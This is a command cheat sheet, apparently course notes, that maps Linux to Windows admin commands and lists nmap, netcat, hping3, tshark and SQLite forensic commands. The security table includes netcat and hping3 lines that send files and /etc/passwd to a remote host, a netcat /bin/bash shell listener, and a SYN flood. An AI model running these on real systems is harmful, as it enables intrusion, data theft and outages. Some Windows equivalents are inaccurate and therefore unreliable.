| Function | Linux Command | Windows Command | Description |
|---|---|---|---|
| Listing Files | `ls` | `dir` | Lists files in a directory |
| | `ls -a` | `dir /a` | Lists all files, including hidden files |
| | `ls -l` | `dir /q` | Lists files in long format, showing permissions, owner, size |
| | `ls -R` | `tree` | Lists directory contents recursively |
| Copying Files | `cp source dest` | `copy source dest` | Copies a file from source to destination |
| | `cp -r source_directory/ dest/` | `xcopy source_directory dest /E` | Recursively copies all files and directories |
| Moving & Renaming | `mv oldname newname` | `ren oldname newname` | Renames or moves a file |
| | `mv [Link] /path/to/directory/` | `move [Link] destination` | Moves file to a specified directory |
| Deleting Files | `rm [Link]` | `del [Link]` | Deletes a file |
| | `rm -r directory` | `rmdir /s directory` | Recursively deletes a directory and its contents |
| Creating Files | `touch filename` | `echo.> filename` | Creates an empty file |
| Viewing File Contents | `cat [Link]` | `type [Link]` | Displays contents of a file |
| | `head -n 5 [Link]` | `more [Link]` | Displays the first 5 lines of a file |
| | `tail -n 5 [Link]` | `type [Link]` | Displays the last 5 lines of a file |
| Directory Navigation | `cd /path/to/directory` | `cd \path\to\directory` | Changes directory |
| | `pwd` | `cd` (no arguments) | Displays the current directory |
| | `tree` | `tree` | Shows directory structure in tree format |
| File Permissions | `chmod 755 filename` | `icacls filename /grant user:F` | Sets file permissions |
| | `chmod 770 ~/projects ~/resources` | `icacls folder /grant user:F` | Sets read, write, execute permissions for owner/group |
| | `chown user:group [Link]` | `takeown /f filename` | Changes ownership of a file |
| Disk Usage | `df -h` | `wmic logicaldisk get size,freespace` | Shows disk usage |
| | `du -sh /path/to/directory` | `chkdsk` | Shows size of a specific directory |
| System Information | `uname -a` | `systeminfo` | Displays system information |
| | `uptime` | `systeminfo` | Shows system uptime |
| | `free -h` | `systeminfo` | Shows memory usage |
| | `lscpu` | `wmic cpu get name` | Displays CPU information |
| | `lsusb` | `[Link]` | Displays USB device information |
| | `lspci` | `[Link]` | Displays PCI device information |
| Network Management | `ifconfig` | `ipconfig` | Shows network interfaces and configurations |
| | `ping address` | `ping address` | Tests network connectivity |
| | `netstat -tulnp` | `netstat -an` | Shows network connections |
| | `traceroute address` | `tracert address` | Traces the route packets take to a network |
| | `nslookup domain` | `nslookup domain` | Queries DNS for domain name or IP |
| Process Management | `ps aux` | `tasklist` | Lists running processes |
| | `kill PID` | `taskkill /PID` | Terminates a process by PID |
| | `top` | `taskmgr` | Displays real-time processes and resource usage |
| | `nice -n 10 command` | `start /low command` | Starts a command with specified priority |
| User Management | `useradd username` | `net user username /add` | Adds a new user |
| | `passwd username` | `net user username *` | Sets or changes a user's password |
| | `passwd -l root` | `net user Administrator /active:no` | Locks a user account |
| | `passwd -u root` | `net user Administrator /active:yes` | Unlocks a user account |
| | `userdel username` | `net user username /delete` | Deletes a user |
| | `whoami` | `whoami` | Shows the current user |
| | `groups username` | `net localgroup` | Displays groups a user belongs to |
| | `sudo visudo -f /etc/sudoers` | - | Edits the sudoers file for permissions |
| | `sudo usermod -aG group username` | `net localgroup group username /add` | Adds a user to a group |
| Environment Variables | `export VAR=value` | `set VAR=value` | Sets environment variables |
| | `printenv VAR` | `echo %VAR%` | Displays an environment variable |
| Text Processing | `grep "pattern" [Link]` | `findstr "pattern" [Link]` | Searches for a pattern in a file |
| | `awk '{print $1}' [Link]` | - | Text processing and manipulation |
| | `sed 's/old/new/g' [Link]` | `sed` | Replaces text in a file |
| | `sort [Link]` | `sort` | Sorts lines in a file |
| | `uniq [Link]` | `uniq` | Removes duplicate lines |
| | `wc -l [Link]` | `find /c` | Counts lines, words, and characters in a file |
| Archiving & Compression | `tar -cvf [Link] files` | `tar` | Archives files into a .tar file |
| | `gzip file` | `gzip file` | Compresses a file using gzip |
| | `zip [Link] file` | `zip [Link] file` | Creates a .zip archive |
| | `unzip [Link]` | `unzip [Link]` | Extracts a .zip archive |
| Scheduling Tasks | `cron` / `crontab -e` | `schtasks` | Schedules tasks |
| | `at 15:00 /path/to/[Link]` | `at 15:00 task` | Executes a task at a specified time |
| Forensics | `dd if=/dev/sdX of=[Link]` | `diskcopy` | Copies data at the block level |
| | `strings file` | Sysinternals `strings` | Extracts readable text from binary files |
| | `sha256sum file` | `certutil -hashfile file SHA256` | Checks file integrity using SHA-256 |
| | `mount /dev/sdX /mnt` | `diskpart` | Mounts or unmounts file systems |
| | `lsof` | `handle` (Sysinternals) | Lists open files |
| Shutdown & Reboot | `shutdown -h now` | `shutdown /s` | Shuts down the system |
| | `reboot` | `shutdown /r` | Reboots the system |
| | `poweroff` | `shutdown /s` | Powers off the system |
| Help & Documentation | `man command` | `command /?` | Displays manual for a command |
| | `info command` | - | Displays detailed information about a command |
| Additional commands | `su - username` | | Switch to another user |
| | `sudo ls /root` | | Execute ls as root |
| | `sudo groupadd project` | | Create a group project |
| | `sudo usermod -aG project student` | | Add user to group project |
| | `grep -i "unauthorized" /var/log/[Link]` | | Search logs for unauthorized access |

| Function | Command | Description |
|---|---|---|
| Nmap Commands | `sudo nmap -sn [Link]/24` | Discovers active hosts |
| | `sudo nmap -sS -p 1-1000 [IP_address]` | SYN scan of ports 1-1000 |
| | `sudo nmap -sV -sS -p 80,443,22 [IP_address]` | Detects service versions |
| | `sudo nmap -O [IP_address]` | OS detection |
| | `sudo nmap --script vuln [IP_address]` | Scans for common vulnerabilities |
| Netcat (nc) Commands | `nc -v [IP_address] [port]` | Retrieves server banners |
| | `nc -zv [IP_address] 20-80` | Scans ports |
| | `nc -lp 55555 > sensitive_data.txt` | Sets up a listener for file transfer |
| | `nc [Server_IP] 55555 < extracted_data.txt` | Simulates data exfiltration |
| | `nc -lp 4444 -e /bin/bash` | Reverse shell listener |
| | `nc [Target_IP] 4444` | Connects to reverse shell |
| hping3 Commands | `sudo hping3 -S --flood -p 80 [IP_address]` | SYN flood test |
| | `sudo hping3 -A -p 80 [IP_address]` | ACK scan (firewall testing) |
| | `sudo hping3 -2 -p 53 [IP_address]` | UDP port scan |
| | `sudo hping3 -1 [IP_address]` | ICMP scan for blocked pings |
| | `sudo hping3 -c 1 [IP_address] -d 100 -E /etc/passwd` | Simulates data exfiltration |
| Wireshark Commands | `[Link] == [Target_IP] && (tcp` | |
| | `[Link]==1 && [Link]==1` | Tracks connection resets and anomalies in TCP responses |
| | `sudo tshark -i eth0 -f "arp"` | Captures ARP traffic to detect ARP spoofing (MITM attack). |
| | `sudo tshark -i eth0 -f "udp port 53"` | Monitors DNS traffic for malicious redirects. |
| | `sudo tshark -i eth0 -f "tcp port 80"` | Captures and analyzes HTTP traffic for suspicious patterns like data exfiltration. |
| | `sudo tshark -i eth0 -f "tcp port 21"` | Monitors FTP traffic for potential data exfiltration. |
| | `sudo tshark -i eth0 -Y "[Link] == 1 && [Link] == 0"` | Captures TCP SYN packets to detect potential SYN flood DoS attacks. |
| | `sudo tshark -i eth0 -f "tcp port 80" -Y "[Link] == POST"` | Captures POST requests during a DoS attack to check for data exfiltration. |
| | `sudo netstat -anp` `netstat -ano` | |
| | `sudo iptables -A INPUT -s <attacker_IP> -j DROP` | Blocks IPs involved in DoS attacks. |
| SQLite | `sqlite3 /path/to/[Link] "SELECT url, title FROM urls WHERE url LIKE '%query%';"` | Extracts browsing history entries that match specific queries (e.g., phishing URLs). |
| | `sqlite3 /path/to/[Link] "SELECT * FROM calls;"` | Retrieves call logs from a SQLite database. |
| | `foremost -i /path/to/device -o /output_directory` | Recovers deleted files from a storage device. |
| | `lsusb` | Lists any external devices |